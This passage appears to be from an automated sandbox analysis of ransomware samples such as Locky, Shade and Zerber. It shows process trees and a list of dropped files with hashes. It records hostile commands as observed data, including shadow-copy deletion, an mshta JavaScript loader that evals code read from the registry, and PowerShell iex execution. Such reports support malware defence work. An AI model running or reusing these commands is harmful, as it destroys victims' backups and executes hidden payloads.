          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          PID:2792
          • C:\Windows\mbhvrmroopgk.exe
            C:\Windows\mbhvrmroopgk.exe
            5⤵
            • Drops startup file
            • Executes dropped EXE
            • Adds Run key to start application
            • Drops file in Program Files directory
            • System Location Discovery: System Language Discovery
            • Modifies system certificate store
            • Suspicious behavior: RenamesItself
            • Suspicious use of AdjustPrivilegeToken
            • System policy modification
            PID:2000
            • C:\Windows\System32\wbem\WMIC.exe
              "C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /noin teractive
              6⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:2424
            • C:\Windows\SysWOW64\NOTEPAD.EXE
              "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\RECOVERY.TXT
              6⤵
              • System Location Discovery: System Language Discovery
              • Opens file in notepad (likely ransom note)
              PID:2912
            • C:\Program Files\Internet Explorer\iexplore.exe
              "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\RECOVERY.HTM
              6⤵
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              PID:2688
              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2688 CREDAT:275457 /prefetch:2
                7⤵
                • System Location Discovery: System Language Discovery
                • Modifies Internet Explorer settings
                • Suspicious use of SetWindowsHookEx
                PID:2976
            • C:\Windows\System32\wbem\WMIC.exe
              "C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /noin teractive
              6⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1804
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c DEL C:\Windows\MBHVRM~1.EXE
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2788
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\Desktop\00272\TROJAN~2.EXE
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1596
    • C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Foreign.niji-e37766201ae534aa196d0afd8e9131f7f2b029aef9cbc5110c7666894c8dd6c6.exe
      Trojan-Ransom.Win32.Foreign.niji-e37766201ae534aa196d0afd8e9131f7f2b029aef9cbc5110c7666894c8dd6c6.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Modifies Control Panel
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      PID:1736
      • C:\Windows\syswow64\svchost.exe
        C:\Windows\syswow64\svchost.exe
        3⤵
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        PID:2728
        • C:\Windows\SysWOW64\svchost.exe
          "C:\Windows\system32\svchost.exe"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          PID:2724
    • C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Gen.nw-b8949ae0d1a481af1cae9df5e01d508d1319b6d47fb329e9b42627e4e2a72a3d.exe
      Trojan-Ransom.Win32.Gen.nw-b8949ae0d1a481af1cae9df5e01d508d1319b6d47fb329e9b42627e4e2a72a3d.exe
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      PID:1616
    • C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Locky.bil-a310a444b8be17dec94e41f1710ebebf6eb84e18fb7f47d795796b7af4f24442.exe
      Trojan-Ransom.Win32.Locky.bil-a310a444b8be17dec94e41f1710ebebf6eb84e18fb7f47d795796b7af4f24442.exe
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      PID:1204
    • C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Locky.d-78e9558a9762cf778a3ba9ba61e0ec73e8d81c22d0945e56ea75d197c512883a.exe
      Trojan-Ransom.Win32.Locky.d-78e9558a9762cf778a3ba9ba61e0ec73e8d81c22d0945e56ea75d197c512883a.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      PID:1752
      • C:\Users\Admin\AppData\Local\Temp\svchost.exe
        C:\Users\Admin\AppData\Local\Temp\svchost.exe
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:2324
      • C:\Windows\system32\cmd.exe
        cmd.exe /C del /Q /F "C:\Users\Admin\AppData\Local\Temp\sysD8E2.tmp"
        3⤵
          PID:1736
      • C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Scatter.jt-100b8bfff550fb74c98a2ef9a71d4bb53553d2d7ba509bb451fe32814ec57e48.exe
        Trojan-Ransom.Win32.Scatter.jt-100b8bfff550fb74c98a2ef9a71d4bb53553d2d7ba509bb451fe32814ec57e48.exe
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        • Suspicious use of FindShellTrayWindow
        PID:1784
      • C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Scatter.kj-8da94dbae85508bec272d12ca4a80a3607a24bf63d3217a31b29b10adecdc592.exe
        Trojan-Ransom.Win32.Scatter.kj-8da94dbae85508bec272d12ca4a80a3607a24bf63d3217a31b29b10adecdc592.exe
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        • Suspicious behavior: MapViewOfSection
        PID:1812
        • C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Scatter.kj-8da94dbae85508bec272d12ca4a80a3607a24bf63d3217a31b29b10adecdc592.exe
          Trojan-Ransom.Win32.Scatter.kj-8da94dbae85508bec272d12ca4a80a3607a24bf63d3217a31b29b10adecdc592.exe
          3⤵
          • Executes dropped EXE
          • Sets desktop wallpaper using registry
          • System Location Discovery: System Language Discovery
          • Modifies Control Panel
          PID:884
          • C:\Program Files\Internet Explorer\iexplore.exe
            "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\-INSTRUCTION.html
            4⤵
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            PID:1952
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1952 CREDAT:275457 /prefetch:2
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              PID:832
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /C del /Q /F "C:\Users\Admin\AppData\Local\Temp\sys3A62.tmp"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:2376
      • C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Shade.lfk-2d9f35116b5be4c23bf217eb04cf533f05caefbe4b2bf4c58638659e6a440326.exe
        Trojan-Ransom.Win32.Shade.lfk-2d9f35116b5be4c23bf217eb04cf533f05caefbe4b2bf4c58638659e6a440326.exe
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        • Suspicious behavior: MapViewOfSection
        PID:1928
        • C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Shade.lfk-2d9f35116b5be4c23bf217eb04cf533f05caefbe4b2bf4c58638659e6a440326.exe
          Trojan-Ransom.Win32.Shade.lfk-2d9f35116b5be4c23bf217eb04cf533f05caefbe4b2bf4c58638659e6a440326.exe
          3⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:952
      • C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Shade.vr-f9cc48c63abafdadfc229a0ac94edffdf983f635dd6ce1a58121a2e881f7fe9c.exe
        Trojan-Ransom.Win32.Shade.vr-f9cc48c63abafdadfc229a0ac94edffdf983f635dd6ce1a58121a2e881f7fe9c.exe
        2⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        • Suspicious use of SetWindowsHookEx
        PID:1596
        • C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Shade.vr-f9cc48c63abafdadfc229a0ac94edffdf983f635dd6ce1a58121a2e881f7fe9c.exe
          "C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Shade.vr-f9cc48c63abafdadfc229a0ac94edffdf983f635dd6ce1a58121a2e881f7fe9c.exe"
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:2908
      • C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Zerber.fctg-380fd1bd4fbbacd3cd0146954622cc8380077639ed7930809fa5489763da54ed.exe
        Trojan-Ransom.Win32.Zerber.fctg-380fd1bd4fbbacd3cd0146954622cc8380077639ed7930809fa5489763da54ed.exe
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        • Suspicious behavior: MapViewOfSection
        PID:1124
        • C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Zerber.fctg-380fd1bd4fbbacd3cd0146954622cc8380077639ed7930809fa5489763da54ed.exe
          Trojan-Ransom.Win32.Zerber.fctg-380fd1bd4fbbacd3cd0146954622cc8380077639ed7930809fa5489763da54ed.exe
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Sets desktop wallpaper using registry
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1680
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\_README_6LU8_.hta"
            4⤵
            • System Location Discovery: System Language Discovery
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            PID:2436
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe"
            4⤵
              PID:1052
              • C:\Windows\system32\taskkill.exe
                taskkill /f /im "Trojan-Ransom.Win32.Zerber.fctg-380fd1bd4fbbacd3cd0146954622cc8380077639ed7930809fa5489763da54ed.exe"
                5⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1552
              • C:\Windows\system32\PING.EXE
                ping -n 1 127.0.0.1
                5⤵
                • System Network Configuration Discovery: Internet Connection Discovery
                • Runs ping.exe
                PID:2416
      • C:\Windows\system32\taskmgr.exe
        "C:\Windows\system32\taskmgr.exe" /4
        1⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:2696
      • C:\Windows\system32\mshta.exe
        "C:\Windows\system32\mshta.exe" javascript:NnxrCN3="tZljD6W5";K8I=new%20ActiveXObject("WScript.Shell");tQbeT9OL9="hC";RV7Yx=K8I.RegRead("HKLM\\software\\Wow6432Node\\Vc8Othhops\\EPo8cL");c7aBwef="gFCwXQG";eval(RV7Yx);Zru3zfXLT="c1cl6oB8cJ";
        1⤵
        • Process spawned unexpected child process
        PID:832
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:cjhvut
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          PID:2956
          • C:\Windows\SysWOW64\regsvr32.exe
            regsvr32.exe
            3⤵
            • Looks for VirtualBox Guest Additions in registry
            • Looks for VirtualBox drivers on disk
            • Adds policy Run key to start application
            • Looks for VMWare Tools registry key
            • Checks BIOS information in registry
            • Adds Run key to start application
            • Maps connected drives based on registry
            • System Location Discovery: System Language Discovery
            • Modifies Internet Explorer settings
            • Suspicious behavior: MapViewOfSection
            PID:1772
            • C:\Windows\SysWOW64\regsvr32.exe
              "C:\Windows\SysWOW64\regsvr32.exe"
              4⤵
              • System Location Discovery: System Language Discovery
              PID:2404
      • C:\Windows\SysWOW64\DllHost.exe
        C:\Windows\SysWOW64\DllHost.exe /Processid:{3F6B5E16-092A-41ED-930B-0B4125D91D4E}
        1⤵
        • System Location Discovery: System Language Discovery
        PID:1760
      • C:\Windows\system32\AUDIODG.EXE
        C:\Windows\system32\AUDIODG.EXE 0x55c
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1988
      • C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Locky.bil-a310a444b8be17dec94e41f1710ebebf6eb84e18fb7f47d795796b7af4f24442.exe
        "C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Locky.bil-a310a444b8be17dec94e41f1710ebebf6eb84e18fb7f47d795796b7af4f24442.exe"
        1⤵
        • Executes dropped EXE
        PID:2432
      • C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Locky.bil-a310a444b8be17dec94e41f1710ebebf6eb84e18fb7f47d795796b7af4f24442.exe
        "C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Locky.bil-a310a444b8be17dec94e41f1710ebebf6eb84e18fb7f47d795796b7af4f24442.exe"
        1⤵
        • Executes dropped EXE
        PID:2596
      • C:\Windows\SysWOW64\DllHost.exe
        C:\Windows\SysWOW64\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}
        1⤵
        • System Location Discovery: System Language Discovery
        PID:2968
      • C:\Windows\system32\taskmgr.exe
        "C:\Windows\system32\taskmgr.exe" /4
        1⤵
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of AdjustPrivilegeToken
        PID:2612
      • C:\Windows\SysWOW64\DllHost.exe
        C:\Windows\SysWOW64\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}
        1⤵
        • System Location Discovery: System Language Discovery
        PID:2968

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Recovery+kxssw.html

        Filesize

        9KB

        MD5

        145b78bc431f7c7cfb146e8923b30f89

        SHA1

        787b2df62b800681882f02844593ea456aeb4b67

        SHA256

        6d5705587ddae4c3d6c73d1d583d4c18c616ae97812c44e0036c78631f914c4c

        SHA512

        eabbc2e65a98cab824a1271aceb6a8dd8ec1a3f0490ff033b11c5e55533a459e453acd47aba1661226a7f7822e5fc3affdb2420ebfb3024ddce8c635bbdf53e0

      • C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Recovery+kxssw.png

        Filesize

        63KB

        MD5

        bc8ceae4c80703f71b18dc949c447a82

        SHA1

        f004e2c374832e791156e8b27029c75105c54a8f

        SHA256

        9c80f6bbd0d1c302ef45d2b675572be2090db685a2f5ee07e6a5ff47d41157b3

        SHA512

        85c02f5971d17f5d25ae6aec43fa1a2e3ef666905a7ea9e8daffa7e7371bc0aae09c3b64f9e52b3e8a497ea041bd1b03ef82ed6292f105e91cdd9d84c39bbb14

      • C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Recovery+kxssw.txt

        Filesize

        1KB

        MD5

        db1932f7d0f41b6fc727c2a05e419fd3

        SHA1

        43558e4d34b8ef531cfa447456dc050fb0bede11

        SHA256

        bf306af3c9d174b6be2974bdbbe87f06b03e921fef3a3184015995ab481c3ad7

        SHA512

        cbbde416ca167b2c1f9338889aefb353f67786771c74766de9d253d601cdf7eae5f7b50eab457cb27382a4347e32dc01fd40926df38b7b01767e07490de56e1e

      • C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\_README_KSKUYX_.hta

        Filesize

        66KB

        MD5

        173c6ee5b1bafd7bc5793b1c2a40e086

        SHA1

        f3c3bff2b6180c469728b2465f71d5fc4d02948f

        SHA256

        a4217e33cf82df137d5aacfc2ae151985e9f486a589da94cd0ca75eecfa0cbfe

        SHA512

        7e936ae2b653f70c7e27f600d4896c6158f5156d0961c85fd7959d914fe5866bf5dfba505d558b7e962513ef74ef208a0dd75ef15eb77baa8886b88209033482

      • C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\asl-v20.txt

        Filesize

        11KB

        MD5

        50ebe08b9611aa345cd01ad6e8718b94

        SHA1

        64000931d8a670bff623fd3a6fb477f61bf66ca4

        SHA256

        d7f8f754e4c8660ff35cd05b37c7ea8a423bb0ebc071f85a4e884ec3ccaf9030

        SHA512

        93973e49506e077d511ef483ad96f869833d9f85a55d72e9b085d01f96cbbf63c146bab867dc1ad522c0abe4ecc89ed482890eeba5377b6e9caeb471c50e3543

      • C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME-JAVAFX.txt

        Filesize

        109KB

        MD5

        5703fab7e03095cc0157dfe9a26e5332

        SHA1

        7f0d896089304d1ef1a73c4dffdf445c50f7e7cb

        SHA256

        0e9228065717b145c8e96b6c8c9f5752d2155f7d5cc9e465e553730be024608f

        SHA512

        9016a58fb43996a9db1b7db152a646bec022ce542f77118261aa4b81e7df40e1bd722199258284229081c35a5e28d9205d92a18891fe261998e2c10212922819

      • C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME.txt

        Filesize

        173KB

        MD5

        4839cc0c454f842cdcc7fd841f3a94a6

        SHA1

        9bd47ab1d18ce6335196f4bc5c775d245fe04ead

        SHA256

        fb0c6dc5d5cea5890611eae54d6f0732b10a6c8b0d6706e1781192f0e9fc1ae0

        SHA512

        c9dce63a6fa1b5b16cbd4baace23ba158367319323e41ca41448453dfb80321fe4b3639f1c178a12c482d9f56c5b957351fe1df3a0387aea220671ff41110151

      • C:\ProgramData\Microsoft\Assistance\Client\1.0\es-ES\Help_MValidator.Lck

        Filesize

        24B

        MD5

        2add52d9a5e6dc1b0c71bff454523e51

        SHA1

        e5f8ff2791465c52ba19107c4f788e2bdfbd9d23

        SHA256

        788459887c4fa8f2753fcb968c69d4618a71ce57d9491a4e44248e0598440b67

        SHA512

        8ca0cc14548d70d46f4b4a6c0e8507d395b5450c4b6f4e3a2008f570edf03b506934c6ebd30061ee1faee5c4fc5aa66254fcdb40b0c375a544b806790dd55a55

      • C:\ProgramData\Microsoft\DRM\Server\Recovery+kxssw.html

        Filesize

        12KB

        MD5

        a072c09cc9c39a17acba61b93992ba85

        SHA1

        7f74e3c869dd815b36bf2c940704d3eabb77fd52

        SHA256

        54b3f7a84bb73b1940fb24590dda9f960bde6fd07522e0afef867d47e8806a08

        SHA512

        ed9a6f45d941938441ba6a4a00ae2f6d3adea8ae03de1563ec47b8775db9e7b50c0c91b496040a2f712114ff9140f93b86a2fdae80ec843c5d41afd68d682ea0

      • C:\ProgramData\Microsoft\DRM\Server\Recovery+kxssw.png

        Filesize

        84KB

        MD5

        d4bc9da0b5fb24ad60dbb7efadd0ac01

        SHA1

        1394bfe5f5a21ce607c9e4f7a43d50ba38fc3503

        SHA256

        0d4a5b1f9bea03bb2d53e22ff69014ea92c892326a9f6a51349e9c7f3284197f

        SHA512

        0d66d3892eed90ccdd8cf8b563cf0bdf20eb5963032d9e81d29342b92ccb7c3f60d0003e923139ab29ea480df5b39b320eb9bf1db15080c45d1c4556099b3a1b

      • C:\ProgramData\Microsoft\Network\Connections\_8-INSTRUCTION.html

        Filesize

        11KB

        MD5

        6182ca2105f6c66cc28f76d3e744fd68

        SHA1

        c8adbfd9c83dc373ec66be0ab8a3732782ae6d81

        SHA256

        756cb93ee163e521f00eb1b50b9a051ef068b87b96a7938db5ae3e273f53672c

        SHA512

        1c07d84f9a89112737e864a73f16e2142a5d14cef1f8254860aa629c162ed90b4f4fd634c48c8d5c96950f30dfc1f6fb88bb97cad2f2a90f763be848ff5da3e3

      • C:\ProgramData\Microsoft\Vault\_4-INSTRUCTION.html

        Filesize

        8KB

        MD5

        b1b7a272c210cb6726917eb1711837bc

        SHA1

        31c6895894395050698e193819b73f042f4d8712

        SHA256

        94afe98c15517a5e27db0e3320c8f4fcee469fc270bf636dc0713295f5c585c1

        SHA512

        1872f62910e2aa9cdd66cf8cd797b8d4c3c79f92a2b9a95800d972f31491784b8fa9933da9f42f47a1d4fa40c4cc64539325acbba995f9b125db6a133113a30f

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

        Filesize

        914B

        MD5

        e4a68ac854ac5242460afd72481b2a44

        SHA1

        df3c24f9bfd666761b268073fe06d1cc8d4f82a4

        SHA256

        cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f

        SHA512

        5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

        Filesize

        1KB

        MD5

        a266bb7dcc38a562631361bbf61dd11b

        SHA1

        3b1efd3a66ea28b16697394703a72ca340a05bd5

        SHA256

        df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

        SHA512

        0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC

        Filesize

        252B

        MD5

        ef4d7b5d8137620268ea909fa422114c

        SHA1

        53a26db5f8ba92a778c17ed507ad02e673c60452

        SHA256

        99c8edac26fc7eb151395fc605f57492310f1ce6ff5ee86b32dcc64236614bb4

        SHA512

        9a419e13ba6a43f498ae057db4f93dea3ab33237b02f30f70fa892ba54f568f20efc31c607bb51239566d04be6b3f8d3c514bcbdafa941cfe6ac9ffab464df9e

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

        Filesize

        342B

        MD5

        ee009e8c348af44708c28616055d86dd

        SHA1

        91f675be49e62dd8580649e25cf77653ece19262

        SHA256

        531d0187c3fdab0ed35e90b5c98d08f2e78de22f6fe0c431ec677fc422de8477

        SHA512

        8aea22a37d6774d7abe7e04bad287050959c7619e742f4f97e9d3c93edad2d4141f5bc48ef74a7127e4f9c3f7999b8f721ca9bce678bc2526ad7869dd710e637

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

        Filesize

        342B

        MD5

        90bd34bb87bd647b12ffa61ab7fa1778

        SHA1

        ca924a5d88cbea3d5b40b5efb9ed505c827d5990

        SHA256

        b9b52dc7296468feee7fe251e7b9c8bc0e9ef4a117aef81805472a3d18fae1e0

        SHA512

        568556c07cd533d4f9754171f4a0a305c047c972200d656dde6302e077acf057f6b90284e9b9139cd8e124108231539e6d6e1534577e614556d211d3380fa685

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

        Filesize

        342B

        MD5

        f48514e5deac1c4298aa18c8629829d2

        SHA1

        64ec8b22b8118feda7e27a83997a5932b99dfa0b

        SHA256

        f921a3acd9f1889e637c7f18dfed7e751888f4bbee34558689c594ecdc12a626

        SHA512

        e916fae1f38111e80789e13a9ea7ada9726573ff4d58917731a2a77d03533a91fc282acd5ccd11e5a3d01a64195a72ef9526e90bddd693210b6e534c45328429

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

        Filesize

        342B

        MD5

        c1353ea3759ba0ac1b75a09b64a86c84

        SHA1

        09fb766254f377123400264cec5ad0bf840c818f

        SHA256

        fc88251d5f68de79a558f86209e694e87f10eb181b5a5b9c7f0a31638e9a74bd

        SHA512

        adc6ed2299b514f90b6e5b1eba430369c3775b06271d4282def8a4f1c8cf4946f462c4274710518d7c0f137e625ae56a9f3576182c6435e71cb2f1ba004357f0

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

        Filesize

        342B

        MD5

        bb8fbce5151ae38acbcb0e5d3be17724

        SHA1

        da8d44d7991b2265247b2088c51256f642204055

        SHA256

        8c61daa0c477a31a76f0b05af755267e35352cf1977ca503acd5a10a486a6878

        SHA512

        9b3c081a2fe81459f6f15c65ea4ba1b4e4784bc9c8e28c19b208c97e4f6869680572f5a5f5f7389e2361093e1321d468883b3b808b16b8f09ba4cd9f0339f329

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

        Filesize

        342B

        MD5

        bc6507f21588be911e0016a996da2935

        SHA1

        8c474ae0c7711bf8b8144aa6559d9b7670716b81

        SHA256

        bdd6efc2bfa442e14187ebb6a8df34bbe8d49354571e703b8346e58d23ba8d18

        SHA512

        ce53dd943a5408b5142772c3e592935c2a266fbb718bc2312a693db9209778fa1b5cd204eb42a78eabebdbdefcf636caa71203f3091659984d87e6f202c3191b

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

        Filesize

        342B

        MD5

        aced61806e74ee036b6411000f73ab40

        SHA1

        45bd7929c1ca5cf91db0aeace3f6c010dd62e998

        SHA256

        9d0daad90dab04f98778b40729d6df8a33bf6d357fca33a1dcb13919666d9bc3

        SHA512

        7ccc356ca8ca7bf18ac08bffcdeba29d9913914cbd39fb68341b34a279518a88c42e0c9df0b2f2928e770a4de14dc05e59f5ab73a37fb104fe65f84eabc5aca9

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

        Filesize

        342B

        MD5

        c360019a4d84a1a2eca6f987e95e790b

        SHA1

        ff3c3e5e97bb584051e9483e103a0cb12f572216

        SHA256

        73932e97b156dacd47eaa74ecafe3b9b0f3db5dfb65e1f48c9dd3d2157759875

        SHA512

        5659ae9526242821e9e461de242ca0701caa99bb167f15aaa272845d39a93cf28a26d88fb601185ba152125af9339c87fa050c2e92841642a942c9626d1a0c28

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

        Filesize

        342B

        MD5

        723189246c54dc27794af0382fabd630

        SHA1

        8e26f8e639a51f27e2562e3c055e798aae1d3704

        SHA256

        7c4459073f244dfef6a620141816592ed8ba7ac02e6397a0371bf0d2472845e8

        SHA512

        c08af2c53ec10427edf1f843ecade84151da881edb40b41a9489c6c7f206bc1efcec561e8e78dc3696b1e2c57094e11c84b079f925ec1dfc4fb2427e2f6618cc

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

        Filesize

        342B

        MD5

        16b0a4607710fde7776b83ddad008feb

        SHA1

        87d4196b1529d560e97d1c53b86818dd004e2c41

        SHA256

        411f5235c7aad8da68d7381aca839c663948f820f0ce9deeb2a594c040abc3c6

        SHA512

        73ddb6bae85519f320702ae14d1683f5e2b3a7a47b042b17d9ae8c9267f9f8158e9bf3aa18491e9e9c992d3f493004853175a6b5bd21ee2651ae6f6e4813f678

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

        Filesize

        342B

        MD5

        97af6c41741e76e5e4479b3c30c0c80f

        SHA1

        a9adc3bc07f4de7749177fdd6922462b8489c636

        SHA256

        7072ea31f7c2ec8d309b9e4f29043433b81cb7c086425f093678a296de02c6f2

        SHA512

        8e07c474363a44d4a670ea53dddb07cca2ed99902d2bc7d9ca9f5c7ac3e23e015c4b67e40e9d43023a317cfe52f1c8d8faa4d4e9655994c2047e52814c0beacb

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

        Filesize

        342B

        MD5

        8226a34afce298171a0cffc77e2d11bd

        SHA1

        59b2a3268bcb7972f60e9c0201f186c2c372e764

        SHA256

        b717dc7c451e15107491ac3a5a1f9cea7f94dd18f2fd5fc4252d81daae56f697

        SHA512

        935d61781c8c6261f40dc9c9ff663f8e8ebd862c1fac1a06d156154d9a445920921531b8ae627f66d57fa07803d44db2f3498667c7f36e1df44b74bd06986ea6

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

        Filesize

        342B

        MD5

        ee99b1cc9ffcb77aef5d97b9dce84873

        SHA1

        123ec72927338ef0827adb91725af88cff412141

        SHA256

        ca717315ac3ea8bf8e76164c1058f2eb9f364f14a61cc1b2eb60e9cea354552f

        SHA512

        4188592994977c204342633b5806dac9aa5e40306315d43cc8f4e730cc2e3f851785c93664ecc2b8df30324a707fadfe0d74f90a2e06d2c85789153b651d3c2d

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

        Filesize

        342B

        MD5

